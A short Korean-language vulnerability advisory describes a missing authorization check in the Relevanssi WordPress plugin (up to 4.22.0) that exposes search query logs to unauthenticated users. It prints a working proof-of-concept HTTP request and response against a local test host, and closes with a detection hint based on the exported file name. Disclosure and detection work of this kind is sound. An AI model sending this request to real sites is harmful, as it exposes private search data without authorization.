
Relevanssi – A Better Search <= 4.22.0 - 인증되지 않은 쿼리 로그 내보내기에 대한 인증 누락
Relevanssi – A Better Search <= 4.22.0 - 인증되지 않은 쿼리 로그 내보내기에 대한 권한 확인 누락
WordPress용 Relevanssi – A Better Search 플러그인은 4.22.0을 포함한 모든 버전에서 relevanssi_export_log_check() 함수에 대한 기능 확인 누락으로 인해 데이터에 대한 무단 액세스에 취약합니다. 이로 인해 인증되지 않은 공격자가 쿼리 로그 데이터를 내보낼 수 있습니다. 공급업체는 적절한 권한 제어를 위해 기능 확인 추가를 검토할 수 있다고 밝혔지만, 이 취약점은 이론적으로 현재 상태로 패치되었습니다.
요청
POST /wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=logging HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/options-general.php?page=relevanssi%2Frelevanssi.php&tab=logging
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: http://kubernetes.docker.internal
Connection: keep-alive
tab=logging&relevanssi_omit_from_logs=&relevanssi_trim_logs=&relevanssi_export=Export+the+log+as+a+CSV+file
응답
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 14:46:13 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.11
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Last-Modified: Wed, 25 Sep 2024 14:46:14 GMT
Content-Disposition: attachment;filename=relevanssi_log.csv
Content-Transfer-Encoding: binary
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/download
"No search keywords logged."
이 플러그인에 대해 아무 작업도 하지 않았기 때문에 실제 환경에서 이를 찾고 있다면 filename=relevanssi_log.csv를 기준으로 매치할 것입니다.